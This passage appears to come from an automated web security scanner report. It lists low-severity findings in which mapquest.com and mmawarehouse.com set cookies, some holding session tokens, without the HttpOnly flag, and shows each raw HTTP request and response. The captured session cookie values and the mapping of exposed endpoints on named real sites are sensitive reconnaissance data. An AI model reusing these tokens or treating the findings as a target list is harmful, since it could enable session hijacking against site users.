The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ncid=txtlnkmqmq00000001 HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:03 GMT; Path=/
Set-Cookie: psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 00:57:02 GMT
Content-Length: 32047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...

11.11. http://www.mapquest.com/_svc/ad/getads

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/ad/getads

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /_svc/ad/getads HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 732

{"request":{"pageView":"initial","userLocale":"en_US","userState":{"locations":[{"role":"mapcenter","lattitude":32.78699999999999,"longitude":-96.79900000000002}],"legs":[],"searches":[],"routeDistanc
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:09 GMT
Content-Length: 464

{"data":{"parameters":{"dotcom-right-header":{"adParametersTypeString":"HTML","encodedStateHash":null,"htmlText":"","type":"HTML"},"bottom-content":{"adParametersTypeString":"UAC","adTitle":null,"adTy
...[SNIP]...

11.12. http://www.mapquest.com/_svc/apixel

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/apixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_svc/apixel?t=jsop&i=_0&v=4&1=mq.main&2=mq%20main&3=no%20referrer&4=map%20%3A%20afarm%20%3A%20baseline&5=none&6=null&7=undefined&8=null HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache,no-store,must-revalidate
Expires: Mon, 1 Feb 2001 08:32:00 GMT
Content-Type: image/gif
Content-Length: 35
Date: Thu, 05 May 2011 00:57:10 GMT


11.13. http://www.mapquest.com/_svc/publishing/promo

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/publishing/promo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /_svc/publishing/promo HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 62

{"key":"winston-site-selector","language":"en","country":"us"}

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 1199

{"data":{"text":"<ul>\r\n <li><a onclick=\"m3.util.Event.publish('EventLog', {action: 'MQSITES-ROUTEPLANNER-CLICK'});\" href=\"http://www.mapquest.com/routeplanner\">Route Planner</a></li>\r\n <
...[SNIP]...

11.14. http://www.mapquest.com/_svc/searchio

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/searchio

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_svc/searchio?action=config&locale=en_US&shapepoints=(32.93119675804705,-96.97066137694627,32.64256910519762,-96.62733862305373) HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Cache-Control: no-transform
Content-Type: application/json;charset=UTF-8
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 101621

{"advertisers":[{"addressSummaryPrefixUrl":null,"addressSummaryTracking":[],"bannerAds":[{"height":0,"magicNumber":"93306669","type":"234x60","width":0}],"branded":true,"brandedSearchOnly":false,"clus
...[SNIP]...

11.15. http://www.mapquest.com/cdn/_uac/adpage.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /cdn/_uac/adpage.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cdn/_uac/adpage.htm HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"1171-1304454928000"
Last-Modified: Tue, 03 May 2011 20:35:28 GMT
Content-Type: text/html
Cteonnt-Length: 1171
Date: Thu, 05 May 2011 00:57:10 GMT
Content-Length: 1171

<html>
<head>
<script type='text/javascript'>
var blockedReferrer = "";
var dom=location.hash
if (dom!=''){
dom=dom.substr(1)
document.domain=dom
}

function adsPageOnL(){
var adFr=window.frameE
...[SNIP]...

11.16. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /cdn/dotcom3/images/new_purple_button.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cdn/dotcom3/images/new_purple_button.jpg HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:10 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"660-1304454926000"
Last-Modified: Tue, 03 May 2011 20:35:26 GMT
Content-Type: image/jpeg
Content-Length: 660
Date: Thu, 05 May 2011 00:57:09 GMT

...[SNIP]...

11.17. http://www.mapquest.com/icons/stop.png

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /icons/stop.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /icons/stop.png?text=A HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:10 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Last-Modified: Tue, 03 May 2011 20:35:24 GMT
Expires: Thu, 05 May 2011 01:21:10 GMT
Content-Type: image/png
Date: Thu, 05 May 2011 00:57:09 GMT
Content-Length: 923

.PNG
.
...IHDR.............e/O]...bIDATx....K.Q..p!.......B..H...x.LM!..m....L.i*....y...-.."...@0....YI.."J...5...wv6...[.m.e...9.....9...8....WN`Na$<t..[..0)f..5C..Y......L.TH.$.^[....
..M.{).%...
...[SNIP]...

11.18. http://www.mmawarehouse.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mmawarehouse.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ASPSESSIONIDCASTQSBA=CBIDGODBKHCLFONNGAPGKJPO; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 65726
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=CBIDGODBKHCLFONNGAPGKJPO; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...

11.19. http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mmawarehouse.com
Path:   /Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASPSESSIONIDCASTQSBA=DBIDGODBMBCIKBCOHINKMKNJ; path=/
  • History50=37411; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 70916
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=37411; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=DBIDGODBMBCIKBCOHINKMKNJ; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...

11.20. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mmawarehouse.com
Path:   /Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASPSESSIONIDCASTQSBA=GBIDGODBMMGIFDGKICDMCOFN; path=/
  • History50=30854; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 66357
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=30854; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=GBIDGODBMMGIFDGKICDMCOFN; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...

11.21. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mmawarehouse.com
Path:   /Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASPSESSIONIDCASTQSBA=IBIDGODBOHAHGLIENKMIAPLN; path=/
  • History50=22942; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 66109
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=22942; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=IBIDGODBOHAHGLIENKMIAPLN; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...

11.22. http://www.mmawarehouse.com/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mmawarehouse.com
Path:   /FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASPSESSIONIDCASTQSBA=JBIDGODBICLOONOEAHEOGHJJ; path=/
  • History50=34079; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 65448
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=34079; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=JBIDGODBICLOONOEAHEOGHJJ; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...

11.23. http://www.mmawarehouse.com/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mmawarehouse.com
Path:   /FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASPSESSIONIDCASTQSBA=CCIDGODBOBGJFCPIECHDNCDM; path=/
  • History50=36372; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 66520
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=36372; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=CCIDGODBOBGJFCPIECHDNCDM; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...

11.24. http://www.mmawarehouse.com/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mmawarehouse.com
Path:   /Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASPSESSIONIDCASTQSBA=PCIDGODBKOKMLDILKMODCCGD; path=/
  • History50=32062; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 66593
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=32062; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=PCIDGODBKOKMLDILKMODCCGD; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...

